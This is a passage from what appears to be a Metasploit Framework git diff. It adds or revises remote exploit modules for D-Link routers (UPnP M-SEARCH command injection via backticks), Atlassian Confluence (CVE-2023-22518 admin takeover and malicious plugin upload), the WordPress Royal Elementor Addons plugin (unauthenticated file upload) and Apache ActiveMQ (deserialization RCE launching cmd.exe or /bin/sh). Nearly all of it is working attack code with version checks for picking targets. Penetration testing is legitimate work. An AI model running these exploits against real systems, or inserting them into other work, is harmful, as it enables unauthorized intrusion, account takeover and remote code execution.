+ hwinfo_table.each do |hwinfo|
+ @d_link['product'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /Product Page/i || hwinfo.text =~ /Product/i
+ @d_link['hardware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /Hardware Version/i
+ @d_link['firmware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /Firmware Version/i
+ end
+ end
+
+ # USE CASE #4: D-Link devices with HTML listed below that contains the model, firmware and hardware version
+ #
+ if @d_link['product'].nil?
+ hwinfo_table = html.css('table#header_container td')
+ hwinfo_table.each do |hwinfo|
+ @d_link['product'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /show_words\(TA2\)/i
+ @d_link['hardware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /show_words\(TA3\)/i
+ @d_link['firmware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /show_words\(sd_FWV\)/i
+ end
+ end
+
+ # USE CASE #5: D-Link devices with dynamically generated version and hardware information
+ # Create HNAP POST request to get these hardware details
+ if @d_link['product'].nil?
+ xml_soap_data = <<~EOS
+
+
+
+
+
+
+ EOS
+ res = send_request_cgi({
+ 'rport' => datastore['HTTP_PORT'],
+ 'method' => 'POST',
+ 'ctype' => 'text/xml',
+ 'uri' => normalize_uri(target_uri.path, 'HNAP1', '/'),
+ 'data' => xml_soap_data.to_s,
+ 'headers' => {
+ 'SOAPACTION' => '"http://purenetworks.com/HNAP1/GetDeviceSettings"'
+ }
+ })
+ if res && res.code == 200 && res.body.include?(' OK')
+ xml = res.get_xml_document
+ unless xml.blank?
+ xml.remove_namespaces!
+ @d_link['product'] = xml.css('ModelName').text
+ @d_link['firmware'] = xml.css('FirmwareVersion').text.delete(' ')
+ @d_link['hardware'] = xml.css('HardwareVersion').text
+ end
+ end
+ end
+
+ # USE CASE #6: D-Link devices with dynamically generated version and hardware information
+ # Create a DHMAPI POST request to get these hardware details
+ if @d_link['product'].nil?
+ xml_soap_data = <<~EOS
+
+
+
+
+
+
+ EOS
+ res = send_request_cgi({
+ 'rport' => datastore['HTTP_PORT'],
+ 'method' => 'POST',
+ 'ctype' => 'text/xml',
+ 'uri' => normalize_uri(target_uri.path, 'DHMAPI', '/'),
+ 'data' => xml_soap_data.to_s,
+ 'headers' => {
+ 'API-ACTION' => 'GetDeviceSettings'
+ }
+ })
+ if res && res.code == 200 && res.body.include?(' OK')
+ xml = res.get_xml_document
+ unless xml.blank?
+ xml.remove_namespaces!
+ @d_link['product'] = xml.css('ModelName').text
+ @d_link['firmware'] = xml.css('FirmwareVersion').text.delete(' ')
+ @d_link['hardware'] = xml.css('HardwareVersion').text
+ end
+ end
+ end
+
+ # check the vulnerable product and firmware versions
+ case @d_link['product']
+ when 'GO-RT-AC750'
+ @d_link['arch'] = 'mipsbe'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.01') && @d_link['hardware'][0] == 'A'
+ when 'DIR-300'
+ if Rex::Version.new(@d_link['firmware']) >= Rex::Version.new('2.00') && Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.15') # hardware version B
+ @d_link['arch'] = 'mipsle'
+ return true
+ elsif Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.06') # hardware version A
+ @d_link['arch'] = 'mipsbe'
+ return true
+ end
+ when 'DIR-600'
+ @d_link['arch'] = 'mipsle'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.18') && @d_link['hardware'][0] == 'B'
+ when 'DIR-645'
+ @d_link['arch'] = 'mipsle'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.05') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
+ when 'DIR-815'
+ @d_link['arch'] = 'mipsle'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.04')
+ when 'DIR-816L'
+ @d_link['arch'] = 'mipsbe'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.06') && (@d_link['hardware'][0] == 'B' || @d_link['hardware'] == 'N/A')
+ when 'DIR-817LW'
+ @d_link['arch'] = 'mipsbe'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.04') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
+ when 'DIR-818LW', 'DIR-818L'
+ @d_link['arch'] = 'mipsbe'
+ return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.04') && @d_link['hardware'][0] == 'B'
+
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.05') && @d_link['hardware'][0] == 'A'
+ when 'DIR-822'
+ @d_link['arch'] = 'mipsbe'
+ return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.03') && @d_link['hardware'][0] == 'B'
+
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('3.12') && @d_link['hardware'][0] == 'C'
+ when 'DIR-823'
+ @d_link['arch'] = 'mipsbe'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.00') && @d_link['hardware'][0] == 'A'
+ when 'DIR-845L'
+ @d_link['arch'] = 'mipsle'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.02') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
+ when 'DIR-850L'
+ @d_link['arch'] = 'mipsbe'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
+ when 'DIR-859'
+ @d_link['arch'] = 'mipsbe'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.06') && @d_link['hardware'][0] == 'A'
+ when 'DIR-860L'
+ @d_link['arch'] = 'armle'
+ return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.10') && @d_link['hardware'][0] == 'A'
+
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.03') && @d_link['hardware'][0] == 'B'
+ when 'DIR-865L'
+ @d_link['arch'] = 'mipsle'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.07') && @d_link['hardware'][0] == 'A'
+ when 'DIR-868L'
+ @d_link['arch'] = 'armle'
+ return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
+
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.05') && @d_link['hardware'][0] == 'B'
+ when 'DIR-869'
+ @d_link['arch'] = 'mipsbe'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.03') && @d_link['hardware'][0] == 'A'
+ when 'DIR-880L'
+ @d_link['arch'] = 'armle'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.08') && @d_link['hardware'][0] == 'A'
+ when 'DIR-890L', 'DIR-890R'
+ @d_link['arch'] = 'armle'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.11') && @d_link['hardware'][0] == 'A'
+ when 'DIR-885L', 'DIR-885R'
+ @d_link['arch'] = 'armle'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
+ when 'DIR-895L', 'DIR-895R'
+ @d_link['arch'] = 'armle'
+ return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
+ end
+ false
+ end
+
+ def execute_command(cmd, _opts = {})
+ payload = "#{datastore['URN']};`#{cmd}`"
+
+ connect_udp
+ header = "M-SEARCH * HTTP/1.1\r\n"
+ header << 'HOST:' + datastore['RHOST'].to_s + ':' + datastore['RPORT'].to_s + "\r\n"
+ header << "ST:#{payload}\r\n"
+ header << "MX:2\r\n"
+ header << "MAN:\"ssdp:discover\"\r\n\r\n"
+ udp_sock.put(header)
+ disconnect_udp
end
def check
- configure_socket
+ print_status("Checking if #{peer} can be exploited.")
+ res = send_request_cgi!({
+ 'rport' => datastore['HTTP_PORT'],
+ 'method' => 'GET',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'uri' => normalize_uri(target_uri.path)
+ })
+ # Check if target is a D-Link network device
+ return CheckCode::Unknown('No response received from target.') unless res
+ return CheckCode::Safe('Likely not a D-Link network device.') unless res.code == 200 && res.body =~ /d-?link/i
- pkt =
- "M-SEARCH * HTTP/1.1\r\n" +
- "Host:239.255.255.250:1900\r\n" +
- "ST:upnp:rootdevice\r\n" +
- "Man:\"ssdp:discover\"\r\n" +
- "MX:2\r\n\r\n"
+ # check if firmware version is vulnerable
+ return CheckCode::Appears("Product info: #{@d_link['product']}|#{@d_link['firmware']}|#{@d_link['hardware']}|#{@d_link['arch']}") if vuln_version?(res)
+ # D-link devices with fixed firmware versions
+ return CheckCode::Safe("Product info: #{@d_link['product']}|#{@d_link['firmware']}|#{@d_link['hardware']}|#{@d_link['arch']}") unless @d_link['arch'].nil?
+ # D-link devices that still could be vulnerable with product information
+ return CheckCode::Detected("Product info: #{@d_link['product']}|#{@d_link['firmware']}|#{@d_link['hardware']}|#{@d_link['arch']}") unless @d_link['product'].nil?
- udp_sock.sendto(pkt, rhost, rport, 0)
-
- res = nil
- 1.upto(5) do
- res,_,_ = udp_sock.recvfrom(65535, 1.0)
- break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
- udp_sock.sendto(pkt, rhost, rport, 0)
- end
-
- # UPnP response:
- # [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1
- # we do not check for the Device ID (DIR-645) and for the firmware version because there are different
- # dlink devices out there and we do not know all the vulnerable versions
-
- if res && res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi
- return Exploit::CheckCode::Detected
- end
-
- Exploit::CheckCode::Unknown
- end
-
- def execute_command(cmd, opts)
- configure_socket
-
- pkt =
- "M-SEARCH * HTTP/1.1\r\n" +
- "Host:239.255.255.250:1900\r\n" +
- "ST:uuid:`#{cmd}`\r\n" +
- "Man:\"ssdp:discover\"\r\n" +
- "MX:2\r\n\r\n"
-
- udp_sock.sendto(pkt, rhost, rport, 0)
+ # D-link devices that still could be vulnerable but no product information available
+ return CheckCode::Detected
end
def exploit
- print_status("#{peer} - Trying to access the device via UPnP ...")
-
- unless check == Exploit::CheckCode::Detected
- fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+ print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+ case target['Type']
+ when :unix_cmd
+ execute_command(payload.encoded)
+ when :linux_dropper
+ # Don't check the response here since the server won't respond
+ # if the payload is successfully executed.
+ execute_cmdstager({ linemax: target.opts['Linemax'] })
end
-
- print_status("#{peer} - Exploiting...")
- execute_cmdstager(
- :flavor => :echo,
- :linemax => 950
- )
end
-
- # the packet stuff was taken from the module miniupnpd_soap_bof.rb
- # We need an unconnected socket because SSDP replies often come
- # from a different sent port than the one we sent to. This also
- # breaks the standard UDP mixin.
- def configure_socket
- self.udp_sock = Rex::Socket::Udp.create({
- 'Context' => { 'Msf' => framework, 'MsfExploit' => self }
- })
- add_socket(self.udp_sock)
- end
-
- # Need to define our own rhost/rport/peer since we aren't
- # using the normal mixins
-
- def rhost
- datastore['RHOST']
- end
-
- def rport
- datastore['RPORT']
- end
-
- def peer
- "#{rhost}:#{rport}"
- end
-
- # Accessor for our UDP socket
- attr_accessor :udp_sock
-
end
diff --git a/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb b/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb
new file mode 100644
index 0000000000..bb6fb9ed56
--- /dev/null
+++ b/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version
+ include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::PayloadPlugin
+
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)',
+ 'Description' => %q{
+ This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
+ Confluence instance administrator account. Using this account, an attacker can then perform all
+ administrative actions that are available to Confluence instance administrator. This module uses the
+ administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
+ execution on the target in the context of the of the user running the confluence server.
+ },
+ 'Author' => [
+ 'Atlassian', # Discovery
+ 'jheysel-r7' # msf module
+ ],
+ 'References' => [
+ [ 'URL', 'https://jira.atlassian.com/browse/CONFSERVER-93142'],
+ [ 'CVE', '2023-22518']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => false,
+ 'Targets' => [
+ [
+ 'Java',
+ {
+ 'Platform' => 'java',
+ 'Arch' => [ARCH_JAVA]
+ },
+ ]
+ ],
+ 'DisclosureDate' => '2023-10-31',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE, ],
+ 'SideEffects' => [ CONFIG_CHANGES, ], # Major config changes - this module overwrites the confluence server with an empty backup with known admin credentials
+ 'Reliability' => [ REPEATABLE_SESSION, ]
+ }
+ )
+ )
+
+ register_options(
+ [
+ Opt::RPORT(8090),
+ OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
+ OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
+ # The endpoint we target to trigger the vulnerability.
+ OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action', '/json/setup-restore-local.action', '/json/setup-restore-progress.action']]),
+ # We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait.
+ OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30])
+ ]
+ )
+ end
+
+ def check
+ confluence_version = get_confluence_version
+ return Exploit::CheckCode::Unknown('Unable to determine the confluence version') unless confluence_version
+
+ # Confluence Server and Confluence Data Center have the same vulnerable version ranges.
+ if confluence_version.between?(Rex::Version.new('1.0.0'), Rex::Version.new('7.19.15')) ||
+ confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) ||
+ confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) ||
+ confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2')) ||
+ confluence_version == Rex::Version.new('8.6.0')
+ return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
+ end
+
+ Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")
+ end
+
+ # https://passlib.readthedocs.io/en/stable/lib/passlib.hash.atlassian_pbkdf2_sha1.html
+ def generate_hash(password)
+ salt = OpenSSL::Random.random_bytes(16)
+ iterations = 10000
+ digest = OpenSSL::Digest.new('SHA1')
+
+ key = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, 32, digest)
+ salted_key = salt + key
+ encoded_hash = Base64.strict_encode64(salted_key)
+
+ '{PKCS5S2}' + encoded_hash
+ end
+
+ def create_zip
+ zip_file = Rex::Zip::Archive.new
+
+ # exportDescriptor.properties needs to be present in the zip file in order for it to be valid.
+ export_descriptor = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-22518', 'exportDescriptor.properties'))
+ zip_file.add_file('exportDescriptor.properties', export_descriptor)
+
+ entities_xml = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-22518', 'entities.xml'))
+ entities_xml.gsub!('NEW_USERNAME_LOWER', datastore['NEW_USERNAME'].downcase)
+ entities_xml.gsub!('NEW_USERNAME', datastore['NEW_USERNAME'])
+ entities_xml.gsub!('NEW_PASSWORD_HASH', generate_hash(datastore['NEW_PASSWORD']))
+
+ zip_file.add_file('entities.xml', entities_xml)
+ zip_file.pack
+ end
+
+ def upload_backup
+ zip_file = create_zip
+ post_data = Rex::MIME::Message.new
+ post_data.add_part('false', nil, nil, 'form-data; name="buildIndex"')
+ post_data.add_part('Upload and import', nil, nil, 'form-data; name="edit"')
+ post_data.add_part(zip_file, 'application/zip', 'binary', "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(8..16)}\"")
+
+ data = post_data.to_s
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT']),
+ 'method' => 'POST',
+ 'data' => data,
+ 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+ 'keep_cookies' => true,
+ 'headers' => {
+ 'X-Atlassian-Token' => 'no-check'
+ },
+ 'vars_get' => {
+ 'synchronous' => 'true'
+ }
+ }, 120)
+
+ fail_with(Failure::UnexpectedReply, "The endpoint #{datastore['CONFLUENCE_TARGET_ENDPOINT']} did not respond with a 302 or a 200") unless res&.code == 302 || res&.code == 200
+ print_good("Exploit Success! Login Using '#{datastore['NEW_USERNAME']} :: #{datastore['NEW_PASSWORD']}'")
+ end
+
+ def exploit
+ print_status("Setting credentials: #{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+
+ # Exploit CVE-2023-22518 by uploading a backup .zip file to confluence with an attacker defined username & password
+ upload_backup
+
+ # Now with admin access, upload a .jsp plugin using the PayloadPlugin mixin to gain RCE on the target system.
+ payload_endpoint = rand_text_alphanumeric(8)
+ plugin_key = rand_text_alpha(8)
+ begin
+ payload_plugin = generate_payload_plugin(plugin_key, payload_endpoint)
+ upload_payload_plugin(payload_plugin, datastore['NEW_USERNAME'], datastore['NEW_PASSWORD'])
+ trigger_payload_plugin(payload_endpoint)
+ ensure
+ delete_payload_plugin(plugin_key, payload_endpoint, datastore['NEW_USERNAME'], datastore['NEW_PASSWORD'])
+ end
+ end
+end
diff --git a/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb b/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
new file mode 100644
index 0000000000..a02e170862
--- /dev/null
+++ b/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
@@ -0,0 +1,139 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HTTP::Wordpress
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'WordPress Royal Elementor Addons RCE',
+ 'Description' => %q{
+ Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin (< 1.3.79).
+ },
+ 'Author' => [
+ 'Fioravante Souza', # Vulnerability discovery
+ 'Valentin Lobstein' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['CVE', '2023-5360'],
+ ['URL', 'https://vulners.com/nuclei/NUCLEI:CVE-2023-5360'],
+ ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']
+ ],
+ 'Platform' => ['unix', 'linux', 'win', 'php'],
+ 'Arch' => [ARCH_PHP, ARCH_CMD],
+ 'Targets' => [['Automatic', {}]],
+ 'DisclosureDate' => '2023-11-23',
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'SSL' => true,
+ 'RPORT' => 443
+ },
+ 'Privileged' => false,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS]
+ }
+ )
+ )
+ end
+
+ def check
+ return CheckCode::Unknown unless wordpress_and_online?
+
+ wp_version = wordpress_version
+ print_status("WordPress Version: #{wp_version}") if wp_version
+
+ check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')
+
+ if check_code.code != 'appears'
+ return CheckCode::Safe
+ end
+
+ plugin_version = check_code.details[:version]
+ print_good("Detected Royal Elementor Addons version: #{plugin_version}")
+ return CheckCode::Appears
+ end
+
+ def exploit
+ print_status('Attempting to retrieve nonce...')
+ nonce = retrieve_nonce
+
+ print_status('Sending payload')
+ uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
+
+ data = {
+ 'action' => 'wpr_addons_upload_file',
+ 'max_file_size' => rand(10001),
+ 'allowed_file_types' => 'ph$p',
+ 'triggering_event' => 'click',
+ 'wpr_addons_nonce' => nonce
+ }
+
+ file_content = ''
+
+ file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"
+
+ post_data = Rex::MIME::Message.new
+ post_data.add_part(file_content, 'application/octet-stream', nil, "form-data; name=\"uploaded_file\"; filename=\"#{file_name}\"")
+ data.each_pair do |key, value|
+ post_data.add_part(value.to_s, nil, nil, "form-data; name=\"#{key}\"")
+ end
+
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'POST',
+ 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+ 'data' => post_data.to_s
+ })
+
+ unless res
+ fail_with(Failure::Unreachable, 'No response received from the target')
+ end
+
+ if res.code == 200 && res.body.include?('success')
+ print_good('Payload uploaded successfully')
+ response_data = JSON.parse(res.body)
+ if response_data.key?('data') && response_data['data'].key?('url')
+ file_url = response_data['data']['url']
+ print_status('Triggering the payload')
+ send_request_cgi({
+ 'uri' => file_url,
+ 'method' => 'GET'
+ })
+
+ else
+ fail_with(Failure::UnexpectedReply, 'Payload uploaded but no URL returned in the response')
+ end
+ else
+ fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')
+ end
+ end
+
+ def retrieve_nonce
+ res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET')
+
+ fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
+ fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200
+
+ match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)
+ fail_with(Failure::NoTarget, 'Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?') if match.nil? || match[1].nil?
+
+ nonce = JSON.parse(match[1])['nonce']
+ fail_with(Failure::NoTarget, 'Parsed a response, but the nonce value is missing') if nonce.nil?
+
+ print_good("Nonce found in response: #{nonce.inspect}")
+ nonce
+ end
+end
diff --git a/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
new file mode 100644
index 0000000000..4f8e45ff16
--- /dev/null
+++ b/modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb
@@ -0,0 +1,199 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ prepend Msf::Exploit::Remote::AutoCheck
+ include Msf::Exploit::Remote::HttpServer
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Retry
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Apache ActiveMQ Unauthenticated Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a deserialization vulnerability in the OpenWire transport unmarshaller in Apache
+ ActiveMQ. Affected versions include 5.18.0 through to 5.18.2, 5.17.0 through to 5.17.5, 5.16.0 through to
+ 5.16.6, and all versions before 5.15.16.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'X1r0z', # Original technical analysis & exploit
+ 'sfewer-r7', # MSF exploit & Rapid7 analysis
+ ],
+ 'References' => [
+ ['CVE', '2023-46604'],
+ ['URL', 'https://github.com/X1r0z/ActiveMQ-RCE'],
+ ['URL', 'https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/'],
+ ['URL', 'https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis'],
+ ['URL', 'https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt']
+ ],
+ 'DisclosureDate' => '2023-10-27',
+ 'Privileged' => false,
+ 'Platform' => %w[win linux unix],
+ 'Arch' => [ARCH_CMD],
+ # The Msf::Exploit::Remote::HttpServer mixin will bring in Exploit::Remote::SocketServer, this will set the
+ # Stance to passive, which is unexpected and results in the exploit running as a background job, as RunAsJob will
+ # be set to true. To avoid this happening, we explicitly set the Stance to Aggressive.
+ 'Stance' => Stance::Aggressive,
+ 'Targets' => [
+ [
+ 'Windows',
+ {
+ 'Platform' => 'win'
+ }
+ ],
+ [
+ 'Linux',
+ {
+ 'Platform' => 'linux'
+ }
+ ],
+ [
+ 'Unix',
+ {
+ 'Platform' => 'unix'
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ # By default ActiveMQ listens for OpenWire requests on TCP port 61616.
+ 'RPORT' => 61616,
+ # The maximum time in seconds to wait for a session.
+ 'WfsDelay' => 30
+ },
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS]
+ }
+ )
+ )
+ end
+
+ def check
+ connect
+
+ res = sock.get_once
+
+ disconnect
+
+ return CheckCode::Unknown unless res
+
+ len, _, magic = res.unpack('NCZ*')
+
+ return CheckCode::Unknown unless res.length == len + 4
+
+ return CheckCode::Unknown unless magic == 'ActiveMQ'
+
+ return CheckCode::Detected unless res =~ /ProviderVersion...(\d+\.\d+\.\d+)/
+
+ version = Rex::Version.new(::Regexp.last_match(1))
+
+ ranges = [
+ ['5.18.0', '5.18.2'],
+ ['5.17.0', '5.17.5'],
+ ['5.16.0', '5.16.6'],
+ ['0.0.0', '5.15.15']
+ ]
+
+ ranges.each do |min, max|
+ if version.between?(Rex::Version.new(min), Rex::Version.new(max))
+ return Exploit::CheckCode::Appears("Apache ActiveMQ #{version}")
+ end
+ end
+
+ Exploit::CheckCode::Safe("Apache ActiveMQ #{version}")
+ end
+
+ def exploit
+ # The payload is send in a CDATA section of an XML file. Therefore, the payload cannot contain a CDATA closing tag.
+ if payload.encoded.include? ']]>'
+ fail_with(Failure::BadConfig, 'The encoded payload data may not contain the CDATA closing tag ]]>')
+ end
+
+ start_service
+
+ connect
+
+ # The vulnerability allows us to instantiate an arbitrary class, with a single arbitrary string parameter. To
+ # leverage this we can use ClassPathXmlApplicationContext, and pass a URL to an XML configuration file we
+ # serve. This XML file allows us to create arbitrary classes, and call arbitrary methods. This is leveraged to
+ # run an attacker supplied command line via java.lang.ProcessBuilder.start.
+ clazz = 'org.springframework.context.support.ClassPathXmlApplicationContext'
+
+ # 31 is the EXCEPTION_RESPONSE data type.
+ data = [31].pack('C')
+ # ResponseMarshaller.looseUnmarshal reads a 4 byte int for the command id.
+ data << [0].pack('N')
+ # and a 1 byte boolean for response required.
+ data << [0].pack('C')
+ # ResponseMarshaller.looseUnmarshal read a 4 byte int for the correlation ID.
+ data << [0].pack('N')
+ # BaseDataStreamMarshaller.looseUnmarsalThrowable wants a boolean true to continue to unmarshall.
+ data << [1].pack('C')
+ # BaseDataStreamMarshaller.looseUnmarshalString reads a byte boolean and if true, reads a UTF-8 string.
+ data << [1].pack('C')
+ # First 2 bytes are the length.
+ data << [clazz.length].pack('n')
+ # Then the string data. This is the class name to instantiate.
+ data << clazz
+ # Same again for the method string. This is the single string parameter used during class instantiation.
+ data << [1].pack('C')
+ data << [get_uri.length].pack('n')
+ data << get_uri
+
+ sock.puts([data.length].pack('N') + data)
+
+ retry_until_truthy(timeout: datastore['WfsDelay']) do
+ !handler_enabled? || session_created?
+ end
+
+ handler
+ ensure
+ cleanup
+ end
+
+ def on_request_uri(cli, request)
+ if request.uri != get_resource
+ super
+ end
+
+ case target['Platform']
+ when 'win'
+ shell = 'cmd.exe'
+ flag = '/c'
+ when 'linux', 'unix'
+ shell = '/bin/sh'
+ flag = '-c'
+ end
+
+ xml = %(
+
+
+
+
+ #{shell}
+ #{flag}
+
+
+
+
+)
+
+ send_response(cli, xml, {
+ 'Content-Type' => 'application/xml',
+ 'Connection' => 'close',
+ 'Pragma' => 'no-cache'
+ })
+
+ print_status('Sent ClassPathXmlApplicationContext configuration file.')
+ end
+
+end
diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb
index dacd058d6d..1df274dee1 100644
--- a/modules/exploits/multi/misc/java_jmx_server.rb
+++ b/modules/exploits/multi/misc/java_jmx_server.rb
@@ -69,7 +69,13 @@ class MetasploitModule < Msf::Exploit::Remote
["metasploit", "JMXPayloadMBean.class"],
["metasploit", "JMXPayload.class"],
]
- @jar.add_files(paths, MetasploitPayloads.path('java'))
+
+ @jar.add_file('metasploit/', '')
+ paths.each do |path_parts|
+ path = ['java', path_parts].flatten.join('/')
+ contents = ::MetasploitPayloads.read(path)
+ @jar.add_file(path_parts.join('/'), contents)
+ end
end
if request.uri =~ /mlet$/
diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb
